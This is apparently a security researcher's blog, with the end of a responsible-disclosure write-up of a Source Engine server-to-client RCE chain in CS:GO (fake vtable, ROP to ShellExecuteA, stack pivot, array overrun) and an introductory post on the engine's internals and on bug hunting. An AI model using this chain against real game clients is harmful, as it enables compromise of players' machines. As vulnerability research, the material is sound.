  5. The server script builds a fake vtable pointer on the target client instance by replicating a ConVar onto the client. This is used to build a fake vtable on the client with a pointer to the fake vtable in a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.

  6. The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.

  7. The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll so the pointer sv_download_url->m_pszString is now at an attacker known location.

  8. The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.

  9. Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value will exploit the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 4. This object pointer will redirect execution by pretending to be an IClientNetworkable* object and redirect the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 7.

  10. Lastly, to execute the ROP chain and achieve RCE, the g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 4. The ROP chain then begins execution. The chain will load necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl given in Step 6. In this case, it is used to execute winver.exe for proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the users files and data.

And there you have it. This entire exploitation happens automatically, and does so by using Frida to inject into the dedicated server process to instrument to do all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action, be sure to full screen it so it’s easier to see:

Disclosure Timeline

  • [2020-05-13] Reported to Valve through HackerOne
  • [2020-05-18] Bug triaged
  • [2021-04-28] Notification that the bugs were fixed in Beta
  • [2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

But sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have also been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this, it is entirely command line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and its networking protocol it uses is magnitudes more complex than that of Source. There hasn’t been too much research done in the public on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam running creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Exploiting the Source Engine (Part 1)

2 August 2018 at 00:00

Introduction

It’s been a long time coming, but here’s my first post on a series about finding and exploiting bugs in Valve Software’s Source Engine. I was first introduced to it through the sandbox game Garry’s Mod in 2010, which introduced me to the field of reverse engineering and paved the way for my favorite hobby, my education, and my eventual employment.

I took a long hiatus from working with the Source Engine when I went to college and got involved obsessed with playing CTF competitions, a type of competition where participants solve challenges that mimic real-world reverse engineering and exploitation tasks. One day, I saw a post made about a TF2 RCE proof-of-concept released against the engine. To be honest, the bug and the exploit was very simple, and nothing more difficult than some of the intermediate challenges one would find in a good CTF. With that knowledge under my belt, I decided to prove myself and come back to the Source Engine with the goal of finding a true Remote Code Execution (RCE).

As it turns out, this was around the time that Valve released their Bug Bounty program through HackerOne, where they boasted a bounty range of $1,000 - $25,000 for these kind of bugs. With a bit of luck, I successfully found and wrote a proof-of-concept for a critical Server to Client RCE bug, and was given a generous bounty of $15,000 from Valve. Everything in this series is dedicated to information I’ve learned along the way about the engine.

NOTE: As of writing, the vulnerability has not been publicly disclosed. I will be doing a writeup of the bug and exploit chain if/when it goes public.

image-20180802185147009
Source games Dota 2, CS:GO, and TF2 continue to hold top active player counts on Steam.

The Source Engine

The Source Engine is a third generation derivative of the famous Quake Engine from 1999 and the Valve’s own GoldSrc engine (the HL1 engine). The engine itself has been used to create some of the most famous FPS game series’ in history, including Half-Life, Team Fortress, Portal, and Counter Strike.

Timeline:

  • 1998 - Valve showcases GoldSrc, a heavily modified Quake engine.
  • 2004 - Valve releases the Source Engine based on GoldSrc.
  • 2007 - The source code to the Source Engine is leaked.
  • 2012 - CS:GO is released, and with it, “Source 1.5” begins development.
  • 2013 - Valve releases the public 2013 SDK for the TF2/CS:S engine containing most of the code necessary to write games for the engine.
  • 2015 - The “Reborn” update for Dota 2 brings the first Source 2 game to market.
  • 2018 - Valve opens their HackerOne program to the public.

The Code:

The first thing that I didn’t truly appreciate about this engine (and other engines in general) is how large it is. The engine is gigantic, featuring millions of lines of C++ code to develop, render, and run games of all types (but mostly first-person games).

The code itself is old and unmaintained. Most of the code was very obviously rushed out to meet deadlines, and honestly it is a huge surprise that the engine even functions at all. This is not unique to Valve, and is very typical in the game development world.

Assets such as models, particles, and maps are all built and run using custom file formats developed by Valve or extended from Quake (yes, file format parsers from 1999). There are still usages of obviously unsafe functions such as strcpy and sprintf, and in general the engine itself has a history of “add, add, add” and very little maintenance.

A lot of the C++ classes included in the engine are straight up dead code. Big features were designed and developed, yet only used for very small parts of the engine. The 2013 SDK tools themselves still have difficulty building valid files for their current engine versions of the engine. Classes derive from anywhere from one to nine or more different base classes, and tend to feature a never-ending maze of abstractions on abstractions. Navigating this codebase is time consuming and generally unpleasant for beginners. All in all, the engine is due for a legacy code rewrite that will likely never happen.

Intro to Source Games:

Source Engine games consists of two separate parts, the engine and the game.

The engine consists of all of the typical game engine features like rendering, networking, the asset loaders for models and materials, and the physics engine. When I refer to the Source Engine, I am referring to this part of the game. The bulk of the engine’s code is found in engine.dll, which is found in the path /bin/engine.dll from the game’s root. This same base code is used in some manner across all SE games, and is typically utilized by 3rd party game developers in its pre-compiled form. The code for the Source Engine was leaked (luckily) as part of the 2007 Valve leak, and this leak is all the code that is available to the public for the engine.

The second part, the game, consists of two main parts, client.dll and server.dll. These binaries contain the compiled game that will use the engine. Both of these dlls will utilize engine.dll heavily in order to function. Inside of client.dll, you will find the code responsible for the GUI subsystem (named VGUI) of the game and the clientside logic of the actual game itself. Inside of server.dll, you will find all of the code to communicate the game’s serverside logic to the remote player’s client.dll. Both of these dlls are found in /[gamedir]/bin/*.dll, where [gamedir] is the game abbreviation (csgo, tf2, etc.).

Both the server and client have shared code that defines the entities of the game and variables that will be synchronized. Shared code is compiled directly into each binary, but some C macro design ensures that only the server parts compile to server.dll, and vice-versa. The engine.dll entity system will synchronize the server’s simulation of the game, and the client’s dll will take these simulations and display them to the player through the engine.dll renderer.

Lastly, a big feature of all Source games that was taken and evolved from the Quake engine is the ConVar system. This system defines a series of variables and commands that are executed on an internal command line, very similar to a cmd.exe or /bin/sh shell. The difference is that, instead of executing new processes, these commands will run functions on either the client or server depending on where its run. The engine defines some low-level ConVars found on both the server and client, while the game dlls add more on top of that depending on the game dll that’s running.

  • A Console Variable (ConVar) takes the form of <name> <value>, where the value can be numerical or string based. Typically used for configuration, certain special ConVars will be synchronized. The server can always request the value of a client’s ConVar. Example: sv_cheats 1 sets the ConVar sv_cheats to 1, which enables cheats.
  • A Console Command (ConCommand) takes the form of <name> <arg0> <arg1> …, and defines a command with a backing C++ function that can be run from the developer console. Sometimes, it is used by the game or the engine to run remote functions (client -> server, server -> client). Example: changelevel de_dust executes the command changelevel with the argument de_dust, which changes the current map when run on the server console.

This is just an intro, more on all of this to follow in future posts.

The Bugs:

All of this old code and custom formats is fantastic for a bug hunter. In 2018, all that’s truly necessary to perform a full chain RCE is a good memory corruption bug to take control and an information leak to bypass ASLR. Typically, the former is the most difficult part of bug hunting in modern software, but later you will see that, for the SE, it is actually the latter.

Here is an overview of the Windows binaries:

  • 32-bit binaries
  • NX - Enabled
  • Full ASLR - Enabled (recently)
  • Stack Cookies - Disabled (in the cases it matters)

If you’re an exploit developer, you would probably find the lack of stack cookies in a game engine with millions of players to be a very shocking discovery. This is a vital shortcoming of the already aging engine, and is essentially unheard of in modern Windows binaries. Valve is well aware of this protection’s existence, and has chosen time and time again not to enable it. I have some speculation as to why this is not enabled (most likely performance or build breaking issues), but regardless, there is a huge point to make: Any controllable stack overflow can overwrite the instruction pointer and divert code execution.

Considering how much the stack is used in this engine, this is a huge benefit to bug hunters. One simple out-of-bounds (OOB) string copy, such as a call to strcpy, will result in swift compromise of the instruction pointer straight into RCE. My first bug, unsurprisingly, is a stack overflow bug, not much different than you would find in a beginner level CTF challenge. But, unlike the CTF, its implications of a full client machine compromise in a series of games with a huge player base leads to the large payout.

Hunting:

When hunting for these bugs, I chose to take a slightly more difficult path of only performing manual code auditing on the publicly available engine code. What this allows me to do is both search for potentially useful bugs and also learn the engine’s internals along the way. While it might be enticing for me to just fuzz a file format and get lots of crashes, fuzzing tends to find surface level bugs that everyone’s finding, and never those really deep, interesting bugs that no one is finding.

As I said previously, the codebase for this engine is gigantic. You should take advantage of all of the tools available to you when searching. My preferred toolset is this:

  • Following code structure and searches using Visual Studio with Resharper++.
  • Cmder (with grep) to search for patterns.
  • IDA Pro to prove the existence of the bug in the newest build.
  • WinDbg and x64dbg to attach to the game and try to trigger the bug.
  • Sourcemod extensions to modify the server for proof-of-concepts

With these tools, my general “process” for bug hunting is this:

  1. Find some section of the client code I feel is exploitable and want to look into more closely

  2. Start reading code. I’ll read for hours until I come across what I think is a possible exploitable bug.

  3. From there, I will open up IDA Pro and locate the function I think is exploitable, then compare its current code with the old, public code I have available.

  4. If it still appears to be exploitable, I will try to find some method to trigger the exploitable function from in-game. This turns out to be one of the hardest parts of the process, because finding a triggerable path to that function is a very difficult task given the size of the engine. Sometimes, the server just can’t trigger the bug remotely. Some familiarity with the engine goes a long way here.

  5. Lastly, I will write Sourcemod plugins that will help me trigger it from a game server to the client, hoping to finally prove the existence of the bug and the exploitability in a proof-of-concept.

Next Time

Next post, I will go more in-depth into the codebase of the Engine and explain the entity and networking system that the Engine utilizes to run the game itself. Also, I will begin introducing some of the techniques I used to write the exploits, including the ASLR and NX bypass. There’s a whole lot more to talk about, and this post barely scratches the service. At the moment, I’m in the process of working on a new undisclosed bug in the engine. Hoping to turn this one into another big payout. Wish me luck!

— Gbps

❌